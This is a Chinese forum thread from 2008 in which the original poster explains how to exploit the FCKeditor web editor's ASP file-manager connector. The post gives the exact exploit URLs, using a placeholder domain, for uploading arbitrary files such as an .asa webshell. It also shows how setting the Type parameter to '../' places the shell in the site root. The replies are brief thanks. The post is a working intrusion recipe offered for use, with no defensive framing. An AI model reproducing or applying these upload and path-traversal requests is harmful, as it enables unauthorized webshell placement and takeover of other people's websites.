★我要吧★

 找回密码
 注册[Register]
搜索
qq空间相册密码查看为什么登陆后需要激活无法注册?

fckeditor网页编辑器的漏洞

[复制链接]
发表于 2008-3-12 13:59:21 | 显示全部楼层 |阅读模式
htt p://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

htt p://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp

所传的文件就到了 htt p://www.xxx.tw/UserFiles/cnandbao/下了经过进一步的考虑,如果这样输入:ht tp://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.所传的文件就到了网站根目录下了

[ 本帖最后由 jack 于 2008-3-12 14:00 编辑 ]
发表于 2009-4-14 20:51:50 | 显示全部楼层
谢谢分享
发表于 2009-4-18 17:07:09 | 显示全部楼层
很想做个网页,不过好象没有免费的上传位置
发表于 2009-4-18 19:00:51 | 显示全部楼层
写得非常好~辛苦啦!谢谢!:hug:
发表于 2009-5-11 00:58:11 | 显示全部楼层
不错的分享,谢谢楼主了
发表于 2009-5-12 12:07:40 | 显示全部楼层
学习了  谢楼主了  :loveliness:
头像被屏蔽
发表于 2010-7-3 10:27:20 | 显示全部楼层
谢谢楼主的分享!学习了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

QQ|手机版|小黑屋|☆我要吧☆ ( 豫ICP备13016831号-1 )

GMT+8, 2024-11-23 11:14 , Processed in 0.076935 second(s), 22 queries .

Powered by abc369 X3.4

© 2001-2023 abc369.

快速回复 返回顶部 返回列表